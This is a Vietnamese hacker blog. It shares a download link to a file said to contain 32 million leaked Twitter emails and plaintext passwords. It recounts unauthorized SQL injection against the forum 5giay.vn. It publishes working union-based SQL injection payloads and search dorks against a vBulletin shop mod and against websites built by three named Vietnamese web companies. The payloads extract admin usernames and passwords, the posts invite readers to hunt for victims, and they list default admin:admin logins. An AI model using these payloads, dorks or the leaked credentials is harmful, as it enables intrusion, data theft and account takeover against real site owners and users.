Thứ Sáu, 17 tháng 2, 2017

Link download 32 triệu tài khoản twitter bị hack và chia sẻ

Passwords for 32M Twitter accounts may have been hacked and leaked

There is yet another hack for users of popular social media sites to worry about. Hackers may have used malware to collect more than 32 million Twitter login credentials that are now being sold on the dark web. Twitter says that its systems have not been breached.
“We are confident that these usernames and credentials were not obtained by a Twitter data breach – our systems have not been breached. In fact, we’ve been working to help keep accounts protected by checking our data against what’s been shared from recent other password leaks,” a Twitter spokesperson said.

 
 Mấy ngày nay thông tin về việc 32 triệu tài khoản của twitter gồm email và mật khẩu dạng plaintext đang được rao bán trên chợ đen và được chia sẻ rộng rãi ở các trang web, facebook và các mạng xã hội, đây là vấn đề cấp bách và lớn cho những ai đang sử dụng Twitter hay mau chóng đổi mật khẩu của mình càng sớm càng tốt để tranh bị mất tài khoản, bên cạnh đó nếu bạn nào đang sử dụng chung một mật khẩu đó với các tài khoản khác thì cũng nhanh chóng đổi mật khẩu mới để thông tin cá nhân được an toàn.



Tuy nhiên theo thông tin chính thức từ Twitter thì những thông tin này do hacker dùng mã độc để thực hiện đánh cắp và tổng hợp lại và rao bán trên chợ đen chứ hệ thống chính của họ vẫn không bị tấn công và mọi thứ vẫn trong tầm kiểm soát.

Bên Twitter cũng có đưa ra biện pháp hạn chế rủi ro và giúp người dụng bảo vệ tài khoản của họ bằng cách kiểm tra những dữ liệu bị rò rỉ và dữ liệu trên hệ thống và thông báo đến những ai đang bị ảnh hưởng từ vụ rò rỉ này để họ khắc phục sớm nhất.

Cuối cùng tôi cũng chia sẻ link download 32 triệu tài khoản này gồm email - mật khẩu không mã hóa, để những ai có nhu cầu tìm hiểu và sử dụng tùy theo mục đích cá nhân. Link download tôi chia sẻ của một người nào đó đã chia sẻ lên mạng, không phải do tôi upload lên, các bạn nên kiểm tra trước khi sử dụng cho an toàn.


Link: https://mega.nz/#!pkJl2QQR!_nWYeIZCF4LGOh2k20Y9X9tl3YPz4_Y1DF4I7vdpKws
File name: Twitter.zip
728.3 MB

Concobe

Thứ Năm, 16 tháng 2, 2017

Tôi đã hack diễn đàn 5giay.vn sử dụng xenforo như thế nào.

Sáng 15-02-2017 trong lúc trao đổi ở hội kín của những thành viên coi nhau như là anh em từ thời XgR còn sống và vẫn âm thầm sống với nhau tới hiện tại, chúng tôi có nhận được một cái lỗ hổng của Xenforo, máu dồn đến nơi cần dồn và ngồi thử hàng với một số trang sài Xenforo lớn ở VN
kết quả cũng có khá nhiều trang mắc lỗ hổng này, trong đó có www.5giay.vn một trang web rao vặt lớn mà ai cũng biết.

Ngồi thử Inject vài câu truy vấn cơ bản và nhận ra là hệ thống không có cản lọc, chỉ cần dùng những gì cơ bản nhất của SQL Injection cũng có thể lấy được những thông tin cần thiết như:





user(), database(), version() : 5s_u1@memcachehaproxy.5giay.vn:5s_db1:5.6.24-log

Nhận thấy điều này có thể gây ảnh hưởng lớn đến hệ thống nên tôi select vài thông tin email của admin và soạn email thông báo để gởi cảnh báo lỗ hổng đến họ, lỗ hổng đã được fix vào ngày hôm sau và tôi nhân được email cảm ơn từ BQT diễn đàn 5giay.vn.




Những ai đang sử dụng mã nguồn Xenforo xin hãy ngay lập tức update mã nguồn của mình lên version mới nhất để tránh tổn thất, bởi exploit này cũng có khá nhiều người biết và đang sử dụng nó rồi.


Quá trình thông báo:
15-02-2017 : Phát hiện lỗ hổng.Thông báo tới BQT diễn đàn 5giay.vn
...
16-02-2017 : Bug được fix trong buổi sáng, chiều nhận được email reply cảm ơn.Confirm là bug đã được fix, viết bài lên blog.


Kiểm thử bởi Concobe

Thứ Tư, 8 tháng 2, 2017

Lỗi SQL injection của mod Fun Shop trên Vbulletin

Như đã hứa thì hôm nay mình sẽ cung cấp một cái bug của 1 mod cũng khá nhiều forum đang sử dụng bị dính lỗi SQL injection và có thể bị khai thác và chiếm quyền, dưới đây là thông tin lỗi:

Mod lỗi: Fun Shop - Hệ Thống Shop Vui Nhộn trên diễn đàn Vbulletin
Author: http://www.vietvbb.vn/up/showthread.php?t=43945
version: All
Dork: inurl:/fshop.php?do=buy&id=
link lỗi: /fshop.php?do=buy&id=SQL Injection
Exploit by: concobe & bula -VHB- huynhdegroup.net

Điều kiện bắt buộc phải có là:
1. victim có cài mod Fun Shop
2. Attacker phải có tài khoản trên victim và đã login vào.


Query giả sử id=6:

/fshop.php?do=buy&id=-6' union select 1,2,3,4,5,6,7,8,9,10-- -
cột lỗi gồm 5,6,7,8

lấy version() :

/fshop.php?do=buy&id=-6' union select 1,2,3,4,version(),6,7,8,9,10-- -

xxx xxx xxx

Đến đây thì có lẽ mọi người hoàn toàn có thể làm những gì mình cần rồi. Mình không ghi ra luôn tất cả những câu query để lấy những thông tin quan trọng mục đích để mọi người tự query và làm phần còn lại để hiểu hơn những gì mình cần làm.

Một số server sẽ có chặn và lọc các truy vấn nguy hiểm nên mọi người có thể dùng thêm những cách bypass khi SQL injection thông thường là sẽ làm được.

Fix lỗi:
- Mở mã nguồn 2 file bên dưới

fshop/fshop_dobuy.php
fshop/ fshop_eventid.php

Tim:
 
$query = $vbulletin->db->query_read("SELECT * FROM " . TABLE_PREFIX . "fshop_items WHERE id='$_GET[id]'");  
$infoitem = $vbulletin->db->fetch_array($query);
$iditem = $_GET['id'];

Thay bằng:
 
$iditem = (int)$_GET['id'];
$query = $vbulletin->db->query_read("SELECT * FROM " . TABLE_PREFIX . "fshop_items WHERE id='$iditem'");  
$infoitem = $vbulletin->db->fetch_array($query);
/*fixed by ccb*/

Exploit by: concobe & bula -VHB- huynhdegroup.net

P/s: Exploit này tuy mình đã public từ rất lâu rồi nhưng đến nay vẫn còn một số không ít các diễn đàn vẫn sử dụng mod này và lỗ hổng vẫn còn tồn tại, điều này thật tệ.

Exploit website sài mã nguồn của cty Quảng Cáo Đại Thống​

# Thông tin Lỗi: SQL Injection các website sài mã nguồn của cty Quảng Cáo Đại Thống
# Nhà phát triển: Thiết kế web: Quảng Cáo Đại Thống - http://daithong.com.vn/
# Chức năng: Website sài mã nguồn PHP của cty Quảng Cáo Đại Thống
# Phiên bản lỗi: Tất cả các phiên bản, trừ các version sau này sài mã nguồn khác.
# Dork: "Thiết kế web: Quảng Cáo Đại Thống"
# Phát hiện bởi: Concobe.
# Ngày phát hiện: 18-06-2014

Rất nhiều website bị lỗ hổng này do sài chung một mã nguồn cho cty này tạo ra và không có lọc cũng như ràng buộc các truy vấn trong code, và lượng khách hàng cũng không ít :(

Chi tiết lỗ hổng:
1. Dính lỗi SQL injection ở phần danh mục catid=
2. Path quản trị mặc định /quanly/
3. Victim demo:


1. Dính lỗi SQL injection ở phần danh mục catid=

Select user, version, database name:

/index.php?page=news&catid=-1 union select 1,group_concat(user(),0x3a,version(),0x3a,database()),3,4,5-- -

Select table name:

/index.php?page=news&catid=-1 union select 1,group_concat(table_name),3,4,5 from information_schema.tables where table_schema=database()-- -

Select column name: admin

/index.php?page=news&catid=-1 union select 1,group_concat(column_name),3,4,5 from information_schema.columns where table_name=0x61646d696e-- -

Select info: column: Id,Username,Password,Status,LastLogin

/index.php?page=news&catid=-1 union select 1,group_concat(Id,0x3a,Username,0x3a,Password),3,4,5 from admin-- -


2. Path quản trị mặc định /quanly/
Toàn bộ các code đã test thì đều có chung đường dẫn truy cập vào khu vực quản lý của admin đó là:

domain-victim.xyz/quanly

3. Victim demo:


Concobe

Exploit website sài mã nguồn của cty Mũi Tên Việt​

# Thông tin Lỗi: SQL Injection các website sài mã nguồn của cty Mũi Tên Việt
# Nhà phát triển: Thiết kế web: Mũi Tên Việt - http://www.vietarrow.com/
# Chức năng: Website sài mã nguồn PHP của cty Mũi Tên Việt
# Phiên bản lỗi: Tất cả các phiên bản, trừ các version sau này sài mã nguồn khác.
# Dork: "Designed by Viet Arrow"
# Phát hiện bởi: Concobe.
# Ngày phát hiện: 12-04-2011

Chi tiết thông tin cty này.

    Công Ty Trách Nhiệm Hữu Hạn Mũi Tên Việt ( Viet Arrow Co., LTD) là công ty phát triển phần mềm và công nghệ Internet, được sáng lập và lãnh đạo bởi các chuyên gia công nghệ và quản lý hàng đầu.

    Viet Arrow cung cấp sản phẩm và dịch vụ đa dạng cho khách hàng, bao gồm các ứng dụng trên Web, tích hợp hệ thống và tư vấn về các hệ thống Công nghệ thông tin. Với năng lực công nghệ, kinh nghiệm tư vấn quản lý, khả năng nắm bắt xu thế thị trường và nhận thức sâu sắc về chiến lược quốc gia trong việc phát triển CNTT nói chung và công nghệ phần mềm nói riêng, Viet Arrow đã đặt ra mục tiêu trở thành nhà cung cấp hàng đầu các giải pháp phần mềm cho các doanh nghiệp và tổ chức tại Việt Nam.

    Ngoài ra, với mong muốn tham gia vào ngành công nghiệp phần mềm nhằm góp phần tăng cường sức cạnh tranh của các công ty Việt Nam trước viễn cảnh hội nhập vào thị trừơng khu vực và toàn thế giới, Viet Arrow đã và đang tăng cường nghiên cứu phát triển để tạo cơ hội đưa sản phẩm ra thị trường nước ngoài với thương hiệu Việt Nam.

    Viet Arrow có thị trường trong lĩnh vực dịch vụ lập trình cho các khách hàng quốc tế (Mỹ, Canada, Đức, các nước Châu Âu, …) cũng như thị trường trong nước bao gồm các cơ quan Nhà nước, các tỉnh thành, các công ty nước ngoài và công ty Việt Nam. Công ty có đội ngũ lập trình viên có nhiều kinh nghiệm và tay nghề cao trong việc phát triển và triển khai các sản phẩm phần mềm lớn trong nước và quốc tế.

Rất nhiều website bị lỗ hổng này do sài chung một mã nguồn cho cty Mũi Tên Việt này tạo ra và không có lọc cũng như ràng buộc các truy vấn trong code, và vì cty này thành lập khá lâu từ lượng khách hàng cũng không ít :(

Chi tiết lỗ hổng:
1. Dính lỗi SQL injection ở phần danh mục, phần chi tiết sản phẩm,...
2. Victim demo:


/index.php?do=content&id=SQLi
/index.php?do=product&id=SQLi
/index.php?do=products&act=detail&id=SQLi

1. Dính lỗi SQL injection ở phần danh mục product&id=

Select user, version, database name:

/index.php?do=product&id=-6 union select 1,2,3,4,group_concat(user(),0x3a,version(),0x3a,database()),6,7,8,9-- -

Select table name:

/index.php?do=product&id=-6 union select 1,2,3,4,group_concat(table_name),6,7,8,9 from information_schema.tables where table_schema=database()-- --- -

Select column name: tt_admin

/index.php?do=product&id=-6 union select 1,2,3,4,group_concat(column_name),6,7,8,9 from information_schema.columns where table_name=0x74745f61646d696e-- -

Select info: column: id,username,password,email,right

/index.php?do=product&id=-6 union select 1,2,3,4,group_concat(Id,0x3a,Username,0x3a,Password,0x3a,email),6,7,8,9 from tt_admin-- -

Còn 2 phần nội dung và chi tiết sản phẩm các bạn tự khai thác he, nó cũng tương tự thôi.

/index.php?do=content&id=SQLi
/index.php?do=products&act=detail&id=SQLi

2. Victim demo:
- Vui lòng tìm kiếm và kiểm thử.

P/s: Giờ mới viết blog và public nên ,... thời gian có hơi sai lệch :3

Concobe

Exploit website sài mã nguồn của cty VIETDESI​

# Thông tin Lỗi: SQL Injection các website sài mã nguồn của cty VIETDESI
# Nhà phát triển: Thiết kế web: cty VIETDESI - http://vietdesi.com/
# Chức năng: Website sài mã nguồn PHP của cty VIETDESI
# Phiên bản lỗi: Tất cả các phiên bản.
# Dork: "Designed by VietDesi"
# Phát hiện bởi: Concobe.
# Ngày phát hiện: 25-03-2015

Chi tiết thông tin cty này.

    Các bạn vào đọc cho khỏe hừ hừ.
    http://vietdesi.com/

Rất nhiều website bị lỗ hổng này do sài chung một mã nguồn cho cty VIETDESI này tạo ra và không có lọc cũng như ràng buộc các truy vấn trong code, và vì cty này thành lập khá lâu từ lượng khách hàng cũng không ít :(

Chi tiết lỗ hổng:
1. Dính lỗi SQL injection ở phần chi tiết sản phẩm, lười check thêm những phần khác...
2. Victim demo.

3. Lỗi dùng chung thông tin đăng nhập và link quản trị.

1. Dính lỗi SQL injection ở phần chi tiết sản phẩm /index.php?frame=product_detail&id=
Select user, version, database name:

/?frame=product_detail&id=-481 UNION SELECT 1,2,group_concat(user(),0x3a,version(),0x3a,database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42-- -

Select table name:

/?frame=product_detail&id=-481 UNION SELECT 1,2,group_concat(table_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42 from information_schema.tables where table_schema=database()-- -

Select column name: jcas_admin

/?frame=product_detail&id=-481 UNION SELECT 1,2,group_concat(column_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42 from information_schema.columns where table_name=0x6a6361735f61646d696e-- -

Select info: column: id,admin_user,admin_pwd,is_super_admin,privilege


/?frame=product_detail&id=-481 UNION SELECT 1,2,group_concat(id,0x3a,admin_user,0x3a,admin_pwd,0x3a,is_super_admin),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42 from jcas_admin-- -

2. Victim demo:
Các bạn tự tìm kiếm theo Dork mình đã cung cấp.

3. Lỗi dùng chung thông tin đăng nhập và link quản trị.
- Link admin mặc định là : site.com/admin/
- user và password dùng chung cho hầu hết là:
admin:admin

P/s: Thông tin này mình đăng lại nên có thể có sai lệch ở thời gian phát hiện bug, và thời gian ghi trên đó là thời điểm chính xác khi mình tìm thấy lỗ hổng của mã nguồn này.
Concobe

Cyberpanel và những lỗ hổng bảo mật đã fix.

Tầm đầu tháng 1/2019 mình thấy đi group nào chuyên về thiết kế website, bán hosting,...Của facebook cũng có những comment khuyên nhau sử dụn...